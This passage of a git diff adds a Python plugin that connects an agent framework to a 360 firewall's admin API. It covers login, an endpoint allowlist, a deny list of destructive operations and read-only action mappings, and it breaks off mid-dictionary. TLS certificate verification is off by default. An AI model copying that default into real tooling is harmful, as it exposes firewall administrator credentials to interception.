-if __name__ == "__main__":
-    main()
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py
new file mode 100644
index 000000000..14678b2df
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw.handler.py
@@ -0,0 +1,1149 @@
+from __future__ import annotations
+
+import asyncio
+import json
+import os
+import urllib.parse
+from typing import Any, Callable, Optional
+
+import requests
+
+from flocks.config.config_writer import ConfigWriter
+from flocks.security import get_secret_manager
+from flocks.tool.registry import ToolContext, ToolResult
+
+
+SERVICE_ID = "360_fw"
+STORAGE_KEY = "360_fw_v5_5"
+PRODUCT_VERSION = "5.5"
+FW_SOFTWARE_VERSION = "V5.5"
+FW_BUILD_VERSION = "V5.5R605P000B20240625"
+
+
+class FwApiError(RuntimeError):
+    pass
+
+
+class RuntimeConfig:
+    def __init__(
+        self,
+        *,
+        base_url: str,
+        username: str,
+        password: str,
+        verify_ssl: bool,
+        timeout: int,
+    ) -> None:
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.verify_ssl = verify_ssl
+        self.timeout = timeout
+
+
+ActionBuilder = Callable[[dict[str, Any]], Any]
+ActionSpec = tuple[str, str, Optional[ActionBuilder]]
+
+
+def _methods(*values: str) -> list[str]:
+    return list(values)
+
+
+DOCUMENTED_API_METHODS: dict[str, list[str]] = {
+    "/login": _methods("POST"),
+    "/sys_info": _methods("GET"),
+    "/addressobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/addressgroup": _methods("GET", "POST", "PUT", "DELETE"),
+    "/serviceobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/servicegroup": _methods("GET", "POST", "PUT", "DELETE"),
+    "/predefined_service": _methods("GET"),
+    "/dom_obj": _methods("GET", "POST", "DELETE"),
+    "/dns_custom": _methods("GET", "POST", "PUT", "DELETE"),
+    "/dns_group": _methods("GET", "POST", "PUT", "DELETE"),
+    "/timeabsobj": _methods("GET", "POST", "DELETE"),
+    "/timecycobj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/fwpolicy": _methods("GET", "POST", "PUT", "DELETE"),
+    "/fwpolicy_state": _methods("PUT"),
+    "/fwpolicy_move": _methods("PUT"),
+    "/policy_group": _methods("GET", "POST", "DELETE"),
+    "/app_policy": _methods("GET", "POST", "DELETE"),
+    "/web_policy": _methods("GET", "POST", "DELETE"),
+    "/interface": _methods("GET"),
+    "/vlan": _methods("GET", "POST", "PUT", "DELETE"),
+    "/vxlan": _methods("GET"),
+    "/static_route": _methods("GET", "POST", "DELETE"),
+    "/healthcheck_list": _methods("GET", "POST", "PUT", "DELETE"),
+    "/link_health_check": _methods("GET", "POST", "PUT", "DELETE"),
+    "/policy_route": _methods("GET", "POST", "DELETE"),
+    "/sdwan_policy": _methods("GET", "POST", "DELETE"),
+    "/sdwan_status": _methods("GET"),
+    "/woc_policy_state": _methods("GET"),
+    "/qos_line": _methods("GET", "POST", "PUT", "DELETE"),
+    "/qos_policy": _methods("GET", "POST", "DELETE"),
+    "/policy_qos_line": _methods("GET"),
+    "/monitor_qos_policy": _methods("GET"),
+    "/security_region": _methods("GET"),
+    "/nat_pool": _methods("GET", "POST", "DELETE"),
+    "/nat_rule_src": _methods("GET"),
+    "/nat_rule_dst": _methods("GET"),
+    "/nat_rule_static": _methods("GET"),
+    "/autoike": _methods("GET", "POST", "DELETE"),
+    "/phase2ike": _methods("POST", "DELETE"),
+    "/ipsec_policy": _methods("GET", "POST", "DELETE"),
+    "/ikesa": _methods("GET"),
+    "/ipsecsa": _methods("GET"),
+    "/tunnel_status_table": _methods("GET"),
+    "/tunnel_status_line": _methods("GET"),
+    "/tunnel_monitor": _methods("POST", "DELETE"),
+    "/gre": _methods("GET", "POST", "PUT", "DELETE"),
+    "/bgp_info": _methods("GET", "POST", "DELETE"),
+    "/bgp_network": _methods("GET", "POST", "DELETE"),
+    "/bgp_peer_group": _methods("GET", "POST", "DELETE"),
+    "/bgp_neighbors": _methods("GET", "POST", "DELETE"),
+    "/bgp_access_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_filter_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_route_map": _methods("GET", "POST", "DELETE"),
+    "/bgp_map_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_prefix_list": _methods("GET", "POST", "DELETE"),
+    "/bgp_prefix_policy": _methods("GET", "POST", "DELETE"),
+    "/bgp_import_check": _methods("PUT"),
+    "/bgp_reflector_switch": _methods("PUT"),
+    "/bgp_timer": _methods("PUT"),
+    "/bgp_route_reflector": _methods("GET", "POST", "DELETE"),
+    "/app_obj": _methods("GET", "POST", "PUT", "DELETE"),
+    "/app_group": _methods("GET", "POST", "DELETE"),
+    "/getAppList": _methods("GET"),
+    "/getAppDetail": _methods("GET"),
+    "/user": _methods("GET", "POST", "DELETE"),
+    "/user_group": _methods("GET", "POST", "PUT", "DELETE"),
+    "/user_obj": _methods("GET"),
+    "/radius": _methods("GET", "POST", "PUT", "DELETE"),
+    "/ldap": _methods("GET", "POST", "DELETE"),
+    "/black_list": _methods("GET", "POST", "DELETE"),
+    "/white_list": _methods("GET", "POST", "DELETE"),
+    "/blackList_group": _methods("GET", "POST", "DELETE"),
+    "/blackListGroup_rename": _methods("PUT"),
+    "/domainBlackList": _methods("GET"),
+    "/domain_blacklist_export": _methods("GET"),
+    "/multiple_ids": _methods("POST", "DELETE"),
+    "/multiple_domains": _methods("POST", "DELETE"),
+    "/protect_policy": _methods("GET", "POST", "DELETE"),
+    "/protect_policy_enable": _methods("PUT"),
+    "/vsys": _methods("POST", "PUT", "DELETE"),
+    "/xml_av_profile": _methods("GET", "POST", "PUT", "DELETE"),
+    "/signature_set": _methods("GET", "POST", "PUT", "DELETE"),
+    "/cpu_state": _methods("GET"),
+    "/memory_state": _methods("GET"),
+    "/device_state": _methods("GET"),
+    "/device_link_state": _methods("GET"),
+    "/interface_flow_state": _methods("GET"),
+    "/interface_flow_bar_state": _methods("GET"),
+    "/user_flow_state": _methods("GET"),
+    "/user_flow_bar_state": _methods("GET"),
+    "/monitor_user": _methods("GET"),
+    "/app_flow_state": _methods("GET"),
+    "/app_flow_bar_state": _methods("GET"),
+    "/url_state": _methods("GET"),
+    "/url_bar_state": _methods("GET"),
+    "/threaten_state": _methods("GET"),
+    "/threaten_bar_state": _methods("GET"),
+    "/interface_monitor": _methods("GET"),
+    "/vxlan_monitor": _methods("GET"),
+    "/lte_config": _methods("GET"),
+    "/loopback": _methods("GET"),
+    "/ha_config": _methods("GET"),
+    "/ha_config_syn": _methods("GET"),
+    "/ha_status_all": _methods("GET"),
+    "/lte_info": _methods("GET"),
+    "/ntp_config": _methods("GET"),
+    "/v0.0.1/ntp_config": _methods("GET"),
+    "/ntp_key": _methods("GET"),
+    "/syslog_server": _methods("GET"),
+    "/v0.0.1/syslog_server": _methods("GET", "POST", "DELETE"),
+    "/logFilter": _methods("GET"),
+    "/fw_policy_config": _methods("GET"),
+    "/license_config": _methods("GET"),
+    "/virtual_route_list": _methods("GET"),
+    "/diagnose": _methods("GET"),
+}
+
+BLOCKED_HIGH_RISK_MUTATIONS: dict[str, set[str]] = {
+    "/save_config": {"GET", "POST", "PUT", "DELETE"},
+    "/change_password": {"GET", "POST", "PUT", "DELETE"},
+    "/config_clear_common": {"GET", "POST", "PUT", "DELETE"},
+    "/config_clear_interface": {"GET", "POST", "PUT", "DELETE"},
+    "/restart": {"GET", "POST", "PUT", "DELETE"},
+    "/restore": {"GET", "POST", "PUT", "DELETE"},
+    "/library_upgrade": {"GET", "POST", "PUT", "DELETE"},
+    "/software_update_now": {"GET", "POST", "PUT", "DELETE"},
+    "/software_update_ontime": {"POST", "PUT", "DELETE"},
+    "/system_upgrade": {"GET", "POST", "PUT", "DELETE"},
+    "/license_config": {"POST", "PUT", "DELETE"},
+    "/ha_config": {"POST", "PUT", "DELETE"},
+    "/fw_policy_config": {"POST", "PUT", "DELETE"},
+    "/global_domain_block_switch": {"PUT", "POST", "DELETE"},
+    "/clearBalckDomainBingo": {"GET", "POST", "PUT", "DELETE"},
+    "/domain_blacklist_import": {"GET", "POST", "PUT", "DELETE"},
+    "/session_monitor": {"DELETE"},
+    "/ispList": {"GET", "POST", "PUT", "DELETE"},
+    "/isp_restore": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_group_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_src_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_dst_move": {"GET", "POST", "PUT", "DELETE"},
+    "/nat_rule_static_move": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_route_move": {"GET", "POST", "PUT", "DELETE"},
+    "/policy_route_state": {"GET", "POST", "PUT", "DELETE"},
+    "/qos_policy_move": {"GET", "POST", "PUT", "DELETE"},
+    "/sdwan_policy_move": {"GET", "POST", "PUT", "DELETE"},
+    "/bgp_clear_bgp_route": {"GET", "POST", "PUT", "DELETE"},
+    "/user_obj": {"POST", "PUT", "DELETE"},
+    "/signature_event": {"POST", "PUT", "DELETE"},
+}
+
+KNOWN_PROBLEM_RESOURCES: dict[str, dict[str, dict[str, Any]]] = {
+    "/domainBlackList": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/global_domain_block_switch": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/domain_blacklist_export": {"GET": {"http_status": 404, "code": 404, "message": "404 Not Found"}},
+    "/radius": {"PUT": {"http_status": 400, "code": 103, "message": "输入的内容长度超过限制"}},
+    "/multiple_ids": {"POST": {"http_status": 400, "code": 1111, "message": "不支持的csp联动协议"}},
+    "/protect_policy": {"POST": {"http_status": 400, "code": 121, "message": "策略数量已达到最大限制"}},
+    "/protect_policy_enable": {"PUT": {"http_status": 400, "code": 87, "message": "目标策略不存在"}},
+    "/vsys": {
+        "POST": {"http_status": 400, "code": 1087, "message": "虚拟路由器或虚拟系统不存在"},
+        "PUT": {"http_status": 400, "code": 1087, "message": "虚拟路由器或虚拟系统不存在"},
+    },
+    "/bgp_route_reflector": {"POST": {"http_status": 400, "code": 484, "message": "对等体标志设置错误"}},
+}
+
+
+def _resolve_ref(value: Any) -> str:
+    if value is None:
+        return ""
+    if not isinstance(value, str):
+        return str(value)
+    if value.startswith("{secret:") and value.endswith("}"):
+        return get_secret_manager().get(value[len("{secret:") : -1]) or ""
+    if value.startswith("{env:") and value.endswith("}"):
+        return os.getenv(value[len("{env:") : -1], "")
+    return value
+
+
+def _raw_service_config() -> dict[str, Any]:
+    raw = ConfigWriter.get_api_service_raw(SERVICE_ID)
+    if not isinstance(raw, dict):
+        raw = ConfigWriter.get_api_service_raw(STORAGE_KEY)
+    return raw if isinstance(raw, dict) else {}
+
+
+def _as_bool(value: Any, default: bool) -> bool:
+    if value is None:
+        return default
+    if isinstance(value, bool):
+        return value
+    if isinstance(value, str):
+        text = value.strip().lower()
+        if text in {"1", "true", "yes", "on"}:
+            return True
+        if text in {"0", "false", "no", "off"}:
+            return False
+    return bool(value)
+
+
+def _config_value(raw: dict[str, Any], *keys: str) -> Any:
+    for key in keys:
+        if raw.get(key) is not None:
+            return raw[key]
+    custom_settings = raw.get("custom_settings")
+    if isinstance(custom_settings, dict):
+        for key in keys:
+            if custom_settings.get(key) is not None:
+                return custom_settings[key]
+    return None
+
+
+def _resolve_verify_ssl(raw: dict[str, Any]) -> bool:
+    value = _config_value(raw, "verify_ssl", "ssl_verify")
+    if value is None:
+        value = os.getenv("FW_VERIFY_SSL")
+    return _as_bool(value, False)
+
+
+def _normalize_base_url(value: str) -> str:
+    base_url = value.rstrip("/")
+    if not base_url:
+        return ""
+    if not base_url.endswith("/API"):
+        base_url = base_url + "/API"
+    return base_url
+
+
+def _load_runtime_config() -> RuntimeConfig:
+    raw = _raw_service_config()
+    sm = get_secret_manager()
+
+    base_url = _normalize_base_url(
+        _resolve_ref(raw.get("base_url"))
+        or _resolve_ref(raw.get("baseUrl"))
+        or os.getenv("FW_BASE_URL", "")
+    )
+    username = (
+        _resolve_ref(raw.get("username"))
+        or sm.get("360_fw_v5_5_username")
+        or sm.get("360_fw_username")
+        or os.getenv("FW_USERNAME", "")
+        or os.getenv("FW_USER", "")
+    )
+    password = (
+        _resolve_ref(raw.get("password"))
+        or sm.get("360_fw_v5_5_password")
+        or sm.get("360_fw_password")
+        or os.getenv("FW_PASSWORD", "")
+        or os.getenv("FW_PASS", "")
+    )
+    timeout_value = raw.get("timeout") or os.getenv("FW_TIMEOUT") or 30
+    try:
+        timeout = int(timeout_value)
+    except (TypeError, ValueError):
+        timeout = 30
+
+    if not base_url:
+        raise FwApiError("360 FW base_url is required")
+    if not username:
+        raise FwApiError("360 FW username is required")
+    if not password:
+        raise FwApiError("360 FW password is required")
+
+    return RuntimeConfig(
+        base_url=base_url,
+        username=username,
+        password=password,
+        verify_ssl=_resolve_verify_ssl(raw),
+        timeout=timeout,
+    )
+
+
+class FwClient:
+    def __init__(self, config: RuntimeConfig) -> None:
+        self.config = config
+        self.base_url = config.base_url
+        self.username = config.username
+        self.password = config.password
+        self.verify_ssl = config.verify_ssl
+        self.timeout = config.timeout
+        self.session = requests.Session()
+        self.session.verify = self.verify_ssl
+        self.authorization: Optional[str] = None
+
+    def login(self) -> dict[str, Any]:
+        resp = self.session.request(
+            "POST",
+            f"{self.base_url}/login",
+            json={"user": self.username, "pwd": self.password},
+            timeout=self.timeout,
+        )
+        data = self._parse_response(resp, "POST", "/login")
+        token = data.get("authorization") if isinstance(data, dict) else None
+        if resp.status_code != 200 or data.get("result") is not True or not token:
+            raise FwApiError(f"login failed: HTTP {resp.status_code}, {self._short(data)}")
+        self.authorization = str(token)
+        self.session.headers.update({"Authorization": self.authorization, "Content-Type": "application/json"})
+        return self._redact_auth(data)
+
+    def get(
+        self,
+        path: str,
+        query: Optional[dict[str, Any]] = None,
+        retry: bool = True,
+    ) -> dict[str, Any]:
+        if not self.authorization:
+            self.login()
+        return self._request_with_retry("GET", path, query=query, body=None, retry=retry)
+
+    def request(
+        self,
+        method: str,
+        path: str,
+        query: Optional[dict[str, Any]] = None,
+        body: Optional[Any] = None,
+        retry: bool = True,
+    ) -> dict[str, Any]:
+        method = method.upper()
+        if method == "GET":
+            return self.get(path, query=query, retry=retry)
+        if method not in {"POST", "PUT", "DELETE"}:
+            raise FwApiError("method must be GET, POST, PUT, or DELETE")
+        if not self.authorization:
+            self.login()
+        return self._request_with_retry(method, path, query=query, body=body, retry=retry)
+
+    def _request_with_retry(
+        self,
+        method: str,
+        path: str,
+        *,
+        query: Optional[dict[str, Any]],
+        body: Optional[Any],
+        retry: bool,
+    ) -> dict[str, Any]:
+        try:
+            data = self._raw_request(method, path, query=query, body=body)
+        except (requests.RequestException, FwApiError):
+            if not retry:
+                raise
+            self.login()
+            data = self._raw_request(method, path, query=query, body=body)
+        if self._is_auth_error(data) and retry:
+            self.login()
+            data = self._raw_request(method, path, query=query, body=body)
+        return data
+
+    def _raw_request(
+        self,
+        method: str,
+        path: str,
+        *,
+        query: Optional[dict[str, Any]],
+        body: Optional[Any],
+    ) -> dict[str, Any]:
+        request_path = build_path(path, query)
+        resp = self.session.request(
+            method,
+            f"{self.base_url}{request_path}",
+            json=body,
+            timeout=self.timeout,
+        )
+        data = self._parse_response(resp, method, request_path)
+        if resp.status_code < 200 or resp.status_code >= 300:
+            raise FwApiError(f"HTTP {resp.status_code} from {method} {request_path}: {self._short(data)}")
+        return data
+
+    @staticmethod
+    def _parse_response(resp: requests.Response, method: str, path: str) -> dict[str, Any]:
+        text = resp.text or ""
+        if not text.strip():
+            return {"result": True, "data": None}
+        try:
+            data = resp.json()
+        except Exception as exc:
+            raise FwApiError(f"non-json response from {method} {path}: HTTP {resp.status_code}, {text[:200]}") from exc
+        if not isinstance(data, dict):
+            return {"result": True, "data": data}
+        return data
+
+    @staticmethod
+    def _is_auth_error(data: dict[str, Any]) -> bool:
+        code = data.get("code")
+        msg = str(data.get("message") or data.get("msg") or data.get("error") or "").lower()
+        return code in {401, "401"} or "authorization" in msg or "token" in msg
+
+    @staticmethod
+    def _redact_auth(data: dict[str, Any]) -> dict[str, Any]:
+        output = dict(data)
+        if "authorization" in output:
+            output["authorization"] = "***"
+        return output
+
+    @staticmethod
+    def _short(data: Any) -> str:
+        return json.dumps(data, ensure_ascii=False)[:300]
+
+
+_CLIENTS: dict[tuple[str, str, bool], FwClient] = {}
+
+
+def _client_cache_key(config: RuntimeConfig) -> tuple[str, str, bool]:
+    return (config.base_url, config.username, config.verify_ssl)
+
+
+def get_client() -> FwClient:
+    config = _load_runtime_config()
+    key = _client_cache_key(config)
+    client = _CLIENTS.get(key)
+    if client is None or client.password != config.password:
+        client = FwClient(config)
+        _CLIENTS[key] = client
+    return client
+
+
+def ok(content: Any) -> ToolResult:
+    return ToolResult(
+        success=True,
+        output=content,
+        metadata={
+            "source": "360 FW",
+            "version": PRODUCT_VERSION,
+            "fw_software_version": FW_SOFTWARE_VERSION,
+            "version_software": FW_BUILD_VERSION,
+        },
+    )
+
+
+def api_result(data: dict[str, Any]) -> ToolResult:
+    if data.get("result") is False:
+        raise FwApiError(error_text(data))
+    code = data.get("code")
+    if code not in (None, 0, "0"):
+        raise FwApiError(error_text(data))
+    return ok(data)
+
+
+def error_text(data: dict[str, Any]) -> str:
+    code = data.get("code")
+    msg = data.get("message") or data.get("msg") or data.get("error")
+    if code is not None or msg:
+        return f"code={code} message={msg}"
+    return json.dumps(data, ensure_ascii=False)[:300]
+
+
+def require_int(value: Any, name: str, default: Optional[int] = None) -> int:
+    if value in (None, "") and default is not None:
+        return default
+    try:
+        return int(value)
+    except Exception as exc:
+        raise FwApiError(f"{name} must be an integer") from exc
+
+
+def require_text(value: Any, name: str, default: Optional[str] = None) -> str:
+    if value in (None, "") and default is not None:
+        return default
+    if value in (None, ""):
+        raise FwApiError(f"{name} is required")
+    text = str(value).strip()
+    if not text:
+        raise FwApiError(f"{name} is required")
+    return text
+
+
+def first_present(args: dict[str, Any], *names: str) -> Any:
+    for name in names:
+        value = args.get(name)
+        if value not in (None, ""):
+            return value
+    return None
+
+
+def require_payload(value: Any, name: str = "body") -> Any:
+    if isinstance(value, str):
+        try:
+            value = json.loads(value)
+        except (TypeError, ValueError, json.JSONDecodeError) as exc:
+            raise FwApiError(f"{name} must be valid JSON") from exc
+    if not isinstance(value, (dict, list)):
+        raise FwApiError(f"{name} must be a JSON object or array")
+    return value
+
+
+def optional_payload(value: Any, name: str = "body") -> Any:
+    if value in (None, ""):
+        return None
+    return require_payload(value, name)
+
+
+def payload_or(args: dict[str, Any], builder: ActionBuilder) -> Any:
+    payload = optional_payload(args.get("body"))
+    if payload is not None:
+        return payload
+    return builder(args)
+
+
+def name_body(args: dict[str, Any], key: str = "name") -> dict[str, Any]:
+    return {key: require_text(args.get(key) or args.get("name"), key)}
+
+
+def address_prefix(value: str, obj_type: int) -> str:
+    if value[:2] in {"0:", "1:", "8:"}:
+        return value
+    return f"{obj_type}:{value}"
+
+
+def build_addressobj_body(args: dict[str, Any]) -> dict[str, Any]:
+    obj_type = require_int(args.get("type", 0), "type")
+    addr = require_text(args.get("addr"), "addr")
+    return {
+        "name": require_text(args.get("name"), "name"),
+        "type": obj_type,
+        "desc": str(args.get("desc") or ""),
+        "item": [{"addr": address_prefix(addr, obj_type)}],
+    }
+
+
+def build_serviceobj_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "name": require_text(args.get("name"), "name"),
+        "desc": str(args.get("desc") or ""),
+        "item": [{"sev_str": require_text(args.get("sev_str"), "sev_str")}],
+    }
+
+
+def build_static_route_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "ip_vrf_name": str(args.get("ip_vrf_name") or "default"),
+        "dst_ip": require_text(args.get("dst_ip"), "dst_ip"),
+        "nh_type": str(args.get("nh_type") or "0"),
+        "nh_ip": require_text(args.get("nh_ip"), "nh_ip"),
+        "oif": str(args.get("oif") or ""),
+        "weigh": str(args.get("weigh") or "1"),
+        "distance": str(args.get("distance") or "255"),
+        "monitor_name": str(args.get("monitor_name") or ""),
+    }
+
+
+def build_policy_group_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {"name": require_text(args.get("name"), "name"), "protocol": str(args.get("protocol") or "1")}
+
+
+def build_fwpolicy_state_body(args: dict[str, Any]) -> dict[str, Any]:
+    return {
+        "enable": require_int(args.get("enable", 0), "enable"),
+        "id": require_int(args.get("id"), "id"),
+        "protocol": require_int(args.get("protocol", 1), "protocol"),
+    }
+
+
+def build_delete_name_body(args: dict[str, Any]) -> dict[str, Any]:
+    body = name_body(args)
+    if args.get("type") not in (None, ""):
+        body["type"] = require_int(args["type"], "type")
+    if args.get("protocol") not in (None, ""):
+        body["protocol"] = require_int(args["protocol"], "protocol")
+    return body
+
+
+def build_path(path: str, query: Optional[dict[str, Any]] = None) -> str:
+    path = normalize_api_path(path)
+    if query:
+        sep = "&" if "?" in path else "?"
+        path = f"{path}{sep}{urllib.parse.urlencode(query, doseq=True)}"
+    return path
+
+
+def normalize_api_path(path: str) -> str:
+    """Normalize a caller-supplied path to a leading-slash form without the "/API" prefix.
+
+    Surrounding whitespace is stripped, a leading "API/" or "/API/" segment is
+    removed, and a leading "/" is added when missing. Any query string is kept.
+
+    Raises:
+        FwApiError: the result is empty or just "/".
+    """
+    path = str(path or "").strip()
+    # "API/x" -> "/API/x" so the prefix strip below handles both spellings.
+    if path.startswith("API/"):
+        path = "/" + path
+    if path.startswith("/API/"):
+        path = path[len("/API") :]
+    # NOTE(review): "API?..." becomes "/API?..." and keeps its "/API" segment,
+    # because the "/API/" strip above has already run — confirm this is intended.
+    if path.startswith("API?"):
+        path = "/" + path
+    if not path.startswith("/"):
+        path = "/" + path
+    # A bare "/API" (or "API") names no resource; reduce it to "/" so it is rejected below.
+    if path == "/API":
+        path = "/"
+    if not path or path == "/":
+        raise FwApiError("path is required")
+    return path
+
+
+def resource_of(path: str) -> str:
+    return normalize_api_path(path).split("?", 1)[0]
+
+
+def reject_high_risk_mutation(method: str, path: str) -> None:
+    resource = resource_of(path)
+    methods = BLOCKED_HIGH_RISK_MUTATIONS.get(resource)
+    if methods and method.upper() in methods:
+        raise FwApiError(f"360 FW integration does not support high-risk FW operations: {method.upper()} {resource}")
+
+
+def validate_documented_api(method: str, path: str) -> None:
+    resource = resource_of(path)
+    methods = DOCUMENTED_API_METHODS.get(resource)
+    if methods is None:
+        raise FwApiError(f"{resource} is not listed in the local FW API document")
+    if method.upper() not in methods:
+        raise FwApiError(f"{method.upper()} {resource} is not listed in the local FW API document")
+
+
+def query_from_args(args: dict[str, Any], allowed: list[str]) -> dict[str, Any] | None:
+    query = args.get("query")
+    if query is not None:
+        if not isinstance(query, dict):
+            raise FwApiError("query must be an object")
+        return query
+    output = {key: args[key] for key in allowed if args.get(key) not in (None, "")}
+    return output or None
+
+
+# Maps each read-only action name to the GET path requested by call_get_action.
+# Several entries embed default query parameters (page, length, period, ...)
+# directly in the path string.
+GET_ACTIONS: dict[str, str] = {
+    "fw_system_info_get": "/sys_info",
+    "fw_interface_list": "/interface",
+    "fw_interface_get": "/interface",
+    "fw_ha_config_get": "/ha_config",
+    "fw_ha_config_syn_get": "/ha_config_syn",
+    "fw_ha_status_all_get": "/ha_status_all",
+    "fw_lte_config_get": "/lte_config",
+    "fw_lte_info_get": "/lte_info",
+    "fw_loopback_list": "/loopback",
+    "fw_ntp_config_get": "/ntp_config",
+    "fw_v0_0_1_ntp_config_get": "/v0.0.1/ntp_config",
+    "fw_ntp_key_get": "/ntp_key",
+    "fw_syslog_server_get": "/syslog_server",
+    "fw_v0_0_1_syslog_server_get": "/v0.0.1/syslog_server",
+    "fw_log_filter_get": "/logFilter",
+    "fw_fw_policy_config_get": "/fw_policy_config",
+    "fw_license_config_get": "/license_config",
+    "fw_virtual_route_list": "/virtual_route_list",
+    "fw_diagnose_get": "/diagnose",
+    "fw_addressobj_list": "/addressobj?page=1&length=100&flag=0",
+    "fw_addressobj_get": "/addressobj",
+    "fw_addressgroup_list": "/addressgroup?page=1&length=100&flag=0",
+    "fw_addressgroup_get": "/addressgroup",
+    "fw_serviceobj_list": "/serviceobj?page=1&length=100&flag=0",
+    "fw_serviceobj_get": "/serviceobj",
+    "fw_servicegroup_list": "/servicegroup?page=1&length=100&flag=0",
+    "fw_servicegroup_get": "/servicegroup",
+    "fw_predefined_service_list": "/predefined_service",
+    "fw_dom_obj_list": "/dom_obj",
+    "fw_dns_custom_list": "/dns_custom",
+    "fw_dns_custom_get": "/dns_custom",
+    "fw_dns_group_list": "/dns_group",
+    "fw_dns_group_get": "/dns_group",
+    "fw_timeabsobj_list": "/timeabsobj?flag=0",
+    "fw_timeabsobj_get": "/timeabsobj",
+    "fw_timecycobj_list": "/timecycobj?flag=0",
+    "fw_timecycobj_get": "/timecycobj",
+    "fw_app_obj_list": "/app_obj",
+    "fw_app_obj_get": "/app_obj",
+    "fw_app_group_list": "/app_group",
+    "fw_app_group_get": "/app_group",
+    "fw_get_app_list": "/getAppList",
+    "fw_get_app_detail": "/getAppList",
+    "fw_blackList_group_list": "/blackList_group",
+    "fw_xml_av_profile_list": "/xml_av_profile",
+    "fw_signature_set_list": "/signature_set",
+    "fw_fwpolicy_list": "/fwpolicy?protocol=1&page=1&length=100&flag=0",
+    "fw_fwpolicy_get": "/fwpolicy",
+    "fw_policy_group_list": "/policy_group?protocol=1",
+    "fw_app_policy_list": "/app_policy",
+    "fw_web_policy_list": "/web_policy",
+    "fw_black_list_list": "/black_list?page=1",
+    "fw_white_list_list": "/white_list?page=1",
+    "fw_protect_policy_list": "/protect_policy?protocol=1",
+    "fw_vlan_list": "/vlan",
+    "fw_vxlan_list": "/vxlan",
+    "fw_static_route_list": "/static_route?protocol=1&ip_vrf_name=default",
+    "fw_healthcheck_list": "/healthcheck_list",
+    "fw_link_health_check_list": "/link_health_check",
+    "fw_qos_line_list": "/qos_line",
+    "fw_qos_policy_list": "/qos_policy",
+    "fw_nat_pool_list": "/nat_pool",
+    "fw_nat_rule_src_list": "/nat_rule_src?protocol=1",
+    "fw_nat_rule_dst_list": "/nat_rule_dst?protocol=1",
+    "fw_nat_rule_static_list": "/nat_rule_static?protocol=1",
+    "fw_policy_route_list": "/policy_route?protocol_type=1",
+    "fw_sdwan_policy_list": "/sdwan_policy",
+    "fw_sdwan_status_get": "/sdwan_status",
+    "fw_woc_policy_state_get": "/woc_policy_state",
+    "fw_gre_list": "/gre?ip_vrf_name=default",
+    "fw_autoike_list": "/autoike",
+    "fw_ipsec_policy_list": "/ipsec_policy",
+    "fw_ikesa_list": "/ikesa",
+    "fw_ipsecsa_list": "/ipsecsa",
+    "fw_tunnel_status_table": "/tunnel_status_table?page=1&length=10",
+    "fw_tunnel_status_line": "/tunnel_status_line?status_type=1&period=1&page=1&length=10",
+    "fw_bgp_info_get": "/bgp_info?ip_vrf_name=default",
+    "fw_bgp_network_list": "/bgp_network?ip_vrf_name=default",
+    "fw_bgp_peer_group_list": "/bgp_peer_group",
+    "fw_bgp_neighbors_list": "/bgp_neighbors?ip_vrf_name=default",
+    "fw_bgp_access_list_list": "/bgp_access_list",
+    "fw_bgp_filter_list_list": "/bgp_filter_list",
+    "fw_bgp_route_map_list": "/bgp_route_map",
+    "fw_bgp_map_list_list": "/bgp_map_list",
+    "fw_bgp_prefix_list_list": "/bgp_prefix_list",
+    "fw_bgp_prefix_policy_list": "/bgp_prefix_policy",
+    "fw_user_list": "/user?page=1&length=100",
+    "fw_user_group_list": "/user_group?page=1&length=100",
+    "fw_user_obj_list": "/user_obj?page=1&length=100",
+    "fw_radius_list": "/radius",
+    "fw_ldap_list": "/ldap",
+    "fw_cpu_state": "/cpu_state?type=1&period=1",
+    "fw_memory_state": "/memory_state?type=2&period=1",
+    "fw_device_state": "/device_state?type=4&period=1",
+    "fw_device_link_state": "/device_link_state?period=1",
+    "fw_interface_flow_state": "/interface_flow_state?period=1&flow=3&inf_type=1",
+    "fw_interface_flow_bar_state": "/interface_flow_bar_state?period=1&flow=3&inf_type=1",
+    "fw_user_flow_state": "/user_flow_state?period=1&flow=3",
+    "fw_user_flow_bar_state": "/user_flow_bar_state?period=1&flow=3",
+    "fw_monitor_user": "/monitor_user?period=1&user_type=2",
+    "fw_app_flow_state": "/app_flow_state?period=1&flow=3&stat_type=1",
+    "fw_app_flow_bar_state": "/app_flow_bar_state?period=1&flow=3&stat_type=1",
+    "fw_url_state": "/url_state?period=1&stat_type=1",
+    "fw_url_bar_state": "/url_bar_state?period=1&stat_type=1",
+    "fw_threaten_state": "/threaten_state?period=1&stat_type=1",
+    "fw_threaten_bar_state": "/threaten_bar_state?period=1&stat_type=1",
+    "fw_get_app_detail_monitor": "/getAppDetail?period=1&stat_type=2",
+    "fw_interface_monitor": "/interface_monitor",
+    "fw_interface_monitor_vlan": "/interface_monitor?inf_type=2",
+    "fw_qos_monitor": "/monitor_qos_policy",
+    "fw_vxlan_monitor": "/vxlan_monitor?period=1",
+}
+
+# Mutation actions with a dedicated body builder:
+# action name -> (HTTP method, path, builder taking the args dict).
+# Every builder goes through payload_or, so an explicit args["body"] takes
+# precedence over the body assembled from individual arguments.
+ACTION_SPECS: dict[str, ActionSpec] = {
+    "fw_addressobj_create": ("POST", "/addressobj", lambda a: payload_or(a, build_addressobj_body)),
+    "fw_addressobj_update": ("PUT", "/addressobj", lambda a: payload_or(a, build_addressobj_body)),
+    "fw_addressobj_delete": ("DELETE", "/addressobj", lambda a: payload_or(a, lambda x: {"name": require_text(x.get("name"), "name"), "type": require_int(x.get("type", 0), "type")})),
